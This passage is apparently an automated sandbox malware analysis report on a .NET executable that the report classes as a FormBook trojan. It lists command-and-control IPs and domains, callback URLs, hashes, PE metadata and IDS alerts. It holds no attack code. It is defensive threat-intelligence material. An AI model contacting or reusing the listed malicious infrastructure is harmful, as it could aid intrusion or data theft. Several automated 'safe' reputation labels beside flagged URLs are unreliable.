                                                          http://www.jiyu-kobo.co.jp/icoiAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://i4.cdn-image.com/__media__/js/min.js?v2.3control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.Vintagepaseo.comcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tiro.comciAuPyHuUkk.exe, 00000000.00000003.351987416.000000000637B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkWcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefixcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            217.160.0.226
                                                            www.xn--aprendes-espaol-brb.comGermany
                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            154.216.110.149
                                                            www.cyebang.comSeychelles
                                                            132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                            208.91.197.27
                                                            www.vintagepaseo.comVirgin Islands (BRITISH)
                                                            40034CONFLUENCE-NETWORK-INCVGtrue

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:501991
                                                            Start date:13.10.2021
                                                            Start time:13:36:28
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 11m 9s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:iAuPyHuUkk (renamed file extension from none to exe)
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:24
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/1@8/3
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 26.8% (good quality ratio 24.7%)
                                                            • Quality average: 69.8%
                                                            • Quality standard deviation: 31.6%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 69
                                                            • Number of non-executed functions: 95
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.209.183, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/501991/sample/iAuPyHuUkk.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            13:37:36API Interceptor1x Sleep call for process: iAuPyHuUkk.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            217.160.0.226vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • www.xn--aprendes-espaol-brb.com/mexq/?4h=0bnTL8qh9&h8yxlz-=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYeoF8uQX181f
                                                            208.91.197.27wDzceoRPhB.exeGet hashmaliciousBrowse
                                                            • www.vaughnmethod.com/ed9s/?j6A=cMgc34DI6EHgRBPPCU1upM8r6W5gmyFdUZ6BCP+wlJ0AAQ+v0J4fB8uzS/jKj/yu2Uo5&2d64u=GZS0ntMXED7DC
                                                            etiyrfIKft.exeGet hashmaliciousBrowse
                                                            • www.weprepareamerica-world.com/n092/?h0Gdj4dh=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91F/535v440&1bkX=KN9l7
                                                            INVPRF2100114_pdf.exeGet hashmaliciousBrowse
                                                            • www.yourotcs.com/euzn/?vPAl-=CR-TLLc&5j=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDv+32oOSRS
                                                            PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                                            • www.thymoscorp.com/n092/?Cptd5=T476+wLEZakNnatpzDgnd+i8GD3CeHIKKZKbWkLuO1H4v0vGZa8Ua7CXK/8Rlqil4H1a&y4=7n3dvv
                                                            2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                            • www.andrewfjohnston.com/b2c0/?1bV=j6ATrf&7nlpd=nPJDWeDX3x/7yoIb4Y8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S/FzrgAx/9vb
                                                            NEW ORDER INQUIRY_Q091421.PDF.exeGet hashmaliciousBrowse
                                                            • www.barrier-to-entry.com/h5jc/?8pW=UAgdrLYBEBHnZD6vumMuWShxuTvQQAMT+4FDgagiYMIIlUmoqNFKWavZLlig6d0hZcfT&1bE8p=8p04q8mHnH
                                                            ugsuHxq7Ey.exeGet hashmaliciousBrowse
                                                            • www.weprepareamerica-world.com/n092/?UL=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91vgJH5r6w0&rP=4hOh3
                                                            DHL_Online_Receipt.docGet hashmaliciousBrowse
                                                            • www.getrichadams.com/c3hy/?yfL8-tq0=+C97xekWOCtRqspsnKWJgGOuAPiwQzy0YYswFyxb/tYUxnF7+gywk2v6MOtw6eF1FCkoSQ==&f6A8=dxo0srcx
                                                            m2F8C6rz9J.exeGet hashmaliciousBrowse
                                                            • www.yesterdaystomorrownow.com/zizv/?FL0lxhs=tq18rE4QkgIvfNIpkqEMdP/7PcSlbVRZ9TDCQpLEuCwXiE5u+3jx/eVPwHHQIFKJLFE+&1bT8s=1bbhp0_P
                                                            AWB.docGet hashmaliciousBrowse
                                                            • www.shans-online.com/fzsg/?i2M8mbL8=wYA5+ODQw7YIFkSefVPDQdsb1XpS7kW79pgoTMk5mjoxU7vP2T6by19X6tBJuHEX3lcOtQ==&X6A=bTMtXz7XNfKd
                                                            SOA.exeGet hashmaliciousBrowse
                                                            • www.andrewfjohnston.com/b2c0/?3ff=y6AT2b&m4C=nPJDWeDSq27+w4JhkI8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S8FsokkK/+Kf
                                                            HBW PAYMENT LIST FOR 2021,20212009.xlsxGet hashmaliciousBrowse
                                                            • www.hivizpeople.com/n092/?ixl0i0t=uaY0THpty5EvCloUtnm06lpodfUxh6yq2Ukbc245yKA9WepW8xtBavSpPmKwlutgZVJfqg==&kb=-Z4LWJsPDRiPHr
                                                            77dsREO8Me.exeGet hashmaliciousBrowse
                                                            • www.yourotcs.com/euzn/?6lDh4=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDFhHGoKQZS&Ph-PB=1bpljFA
                                                            Sales _DEG212004755711421641.pdf.exeGet hashmaliciousBrowse
                                                            • www.traveladvisorsuccess.net/gs2m/?8pHX=5jhxgd&h4=R9Myd3XtH8UfpLcxkW7UMZG2K+ZHkiBKmQ+KXW7xNpgHOl826W3TGb5gIiCaUB40A9/Y
                                                            3xzHrbPdZ7.exeGet hashmaliciousBrowse
                                                            • vpn.premrera.com:443/viewpre.asp?cstring=wcxbaa-1753643374&tom=255&id=6003031
                                                            VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                                            • www.cpb.site/nthe/?xtxh=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&U2=mv-t_rDPAPsD6l
                                                            MV TAICHUNG.xlsxGet hashmaliciousBrowse
                                                            • www.cpb.site/nthe/?7nMt=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&gDHho=b2JPovgHUt
                                                            BIN.exeGet hashmaliciousBrowse
                                                            • www.jwpropertiestn.com/n8ba/?I6El7rEX=iMNnVuY+gvXz0j53tPU+imZoGlggyOcz8e4ohSepbhwGfYAQxyq22Rg/4FGnobgDSPq5&yBZ02=2df8xb-H6hatkZkp
                                                            OrdGreece89244.exeGet hashmaliciousBrowse
                                                            • www.carstoriesusa.net/rvoe/?q6pHq=L4-hsduP_n0dm&5jn=fAOs8VWxDgCcN/b38ZjPEpzSltT9i6eUIfWB05FDSs6jml76oEIdxB/bsn2NMp244tD1hAXsWQ==
                                                            REMMITANCE COPY.exeGet hashmaliciousBrowse
                                                            • www.lovefromnewyork.com/kmb0/?H6JHLVy=kV+lEXg8yEf0RijPwLmsZpVBvRfnl4wggG07Ng5Cei2p8cSyeu82h3Ryg2Q6rnDNHAltvCyP6Q==&r48XKx=9rAHYr10f

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            www.xn--aprendes-espaol-brb.comXaTgTJhfol.exeGet hashmaliciousBrowse
                                                            • 217.160.0.226
                                                            vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • 217.160.0.226
                                                            windowsupdate.s.llnwi.netORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            HqiJ8HpbxU.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            PEKv5PX7Wq.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            R6QyqCNJgljVTjY.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            SsbgfSoVLC.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            pvHBhNUyIm.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            569vj51Zrs.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            correction HAWB.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            correction HAWB.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            Statement of Account.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            Statement of Account.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            jh6KzwrXQp.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            heX1kOkwqy.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            mixsix_20211013-084409.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            2rd Quater Order Quotation.zip.xlsGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            DOC REC EIPT.htmlGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            Efe-8 GPP Project Steel Pipe Tender.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            emil.franchi@global.com #Ud83d#Udce0 VGX47BBSBJ44838.HTMGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            DHL Lieferschein,pdf.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKx86Get hashmaliciousBrowse
                                                            • 154.92.66.213
                                                            4SkZvkMy6JGet hashmaliciousBrowse
                                                            • 45.205.161.234
                                                            jIIPdrw41aGet hashmaliciousBrowse
                                                            • 156.242.206.51
                                                            Lv9eznkydx.exeGet hashmaliciousBrowse
                                                            • 156.242.193.106
                                                            yir8ieZzXLGet hashmaliciousBrowse
                                                            • 156.242.206.31
                                                            UpsxN0u4wiGet hashmaliciousBrowse
                                                            • 156.243.213.52
                                                            7yIx6ZIBpIGet hashmaliciousBrowse
                                                            • 154.203.73.118
                                                            4uSa8tiph0Get hashmaliciousBrowse
                                                            • 45.205.161.238
                                                            D_13567899.exeGet hashmaliciousBrowse
                                                            • 156.250.197.5
                                                            Y76514IzYhGet hashmaliciousBrowse
                                                            • 160.124.153.91
                                                            RZo4KTtZbbGet hashmaliciousBrowse
                                                            • 156.251.7.181
                                                            Oq1I3DGMP8Get hashmaliciousBrowse
                                                            • 156.242.159.6
                                                            46gV91KJhQGet hashmaliciousBrowse
                                                            • 156.244.234.135
                                                            RaVPWTArgGGet hashmaliciousBrowse
                                                            • 156.242.159.3
                                                            ZFb3RmLJzoGet hashmaliciousBrowse
                                                            • 156.244.234.133
                                                            vHLDOsbYKAGet hashmaliciousBrowse
                                                            • 156.242.206.52
                                                            T5BjNBDzJaGet hashmaliciousBrowse
                                                            • 156.252.64.214
                                                            hnBBQPVGVRGet hashmaliciousBrowse
                                                            • 154.209.59.237
                                                            55bUuUSd6jGet hashmaliciousBrowse
                                                            • 156.242.30.39
                                                            tI0W00k1vtGet hashmaliciousBrowse
                                                            • 156.251.3.6
                                                            ONEANDONE-ASBrauerstrasse48DEvbc.exeGet hashmaliciousBrowse
                                                            • 217.160.0.17
                                                            justificante de la transfer.exeGet hashmaliciousBrowse
                                                            • 212.227.15.158
                                                            vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • 74.208.236.170
                                                            82051082.exeGet hashmaliciousBrowse
                                                            • 213.171.195.105
                                                            8205108.exeGet hashmaliciousBrowse
                                                            • 74.208.236.156
                                                            Lv9eznkydx.exeGet hashmaliciousBrowse
                                                            • 217.160.0.238
                                                            c9.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            2e.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            a3.exeGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            a04.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            50.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            Quote -0071021.exeGet hashmaliciousBrowse
                                                            • 217.160.0.7
                                                            DHL SHIPMENT.HTMLGet hashmaliciousBrowse
                                                            • 217.160.0.196
                                                            hwIILTIn0n.exeGet hashmaliciousBrowse
                                                            • 217.160.0.17
                                                            just.exeGet hashmaliciousBrowse
                                                            • 212.227.15.158
                                                            2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                            • 74.208.236.156
                                                            0n1pEFuGKC.exeGet hashmaliciousBrowse
                                                            • 74.208.236.145
                                                            VmbABLKNbD.exeGet hashmaliciousBrowse
                                                            • 74.208.236.108
                                                            Update-KB250-x86.exeGet hashmaliciousBrowse
                                                            • 74.208.5.20
                                                            Update-KB2984-x86.exeGet hashmaliciousBrowse
                                                            • 74.208.5.20

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iAuPyHuUkk.exe.log
                                                            Process:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1308
                                                            Entropy (8bit):5.348115897127242
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                            MD5:832D6A22CE7798D72609B9C21B4AF152
                                                            SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                            SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                            SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.507453805098472
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:iAuPyHuUkk.exe
                                                            File size:698880
                                                            MD5:6040407905ea1aa24dd58dc8befa4255
                                                            SHA1:96ecf27fd10a6663cbfaadb7643abeaf4061ea77
                                                            SHA256:2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
                                                            SHA512:d16e31ae6f510ab9f2f2474c064781c15e666f871a969f394f3e6590c7c1dabf19a98c62866e0342d4e6ec9cb40ab2f036c0d687c92f34df7527c340dae923f2
                                                            SSDEEP:12288:hSBIB+gqzVl16yDr67jAkWoDq5jAyWb3PnB5JRU/V18H:sBVVmEJaqdAtj/RRGV
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ... ....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:d6e0ececc8e8f4cc

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x481a8a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x61668406 [Wed Oct 13 07:00:22 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x81a380x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x2a838.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x7fa900x7fc00False0.915104039261data7.86255981519IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x820000x2a8380x2aa00False0.18847369868data5.44795610818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xae0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x822e00x2762PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                            RT_ICON0x84a440x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                            RT_ICON0x9526c0x94a8data
                                                            RT_ICON0x9e7140x5488data
                                                            RT_ICON0xa3b9c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 520093696
                                                            RT_ICON0xa7dc40x25a8data
                                                            RT_ICON0xaa36c0x10a8data
                                                            RT_ICON0xab4140x988data
                                                            RT_ICON0xabd9c0x468GLS_BINARY_LSB_FIRST
                                                            RT_GROUP_ICON0xac2040x84data
                                                            RT_GROUP_ICON0xac2880x4cdata
                                                            RT_VERSION0xac2d40x378data
                                                            RT_MANIFEST0xac64c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyrightCopyright Gottschalks 2011
                                                            Assembly Version1.0.0.0
                                                            InternalNameDictionaryEnumerat.exe
                                                            FileVersion1.0.0.0
                                                            CompanyNameGottschalks
                                                            LegalTrademarks
                                                            Comments
                                                            ProductNameMapEditor1
                                                            ProductVersion1.0.0.0
                                                            FileDescriptionMapEditor1
                                                            OriginalFilenameDictionaryEnumerat.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            10/13/21-13:39:27.811719ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                            10/13/21-13:39:28.079722TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149
                                                            10/13/21-13:39:28.079722TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149
                                                            10/13/21-13:39:28.079722TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 13, 2021 13:39:05.430855036 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.576894045 CEST8049805208.91.197.27192.168.2.6
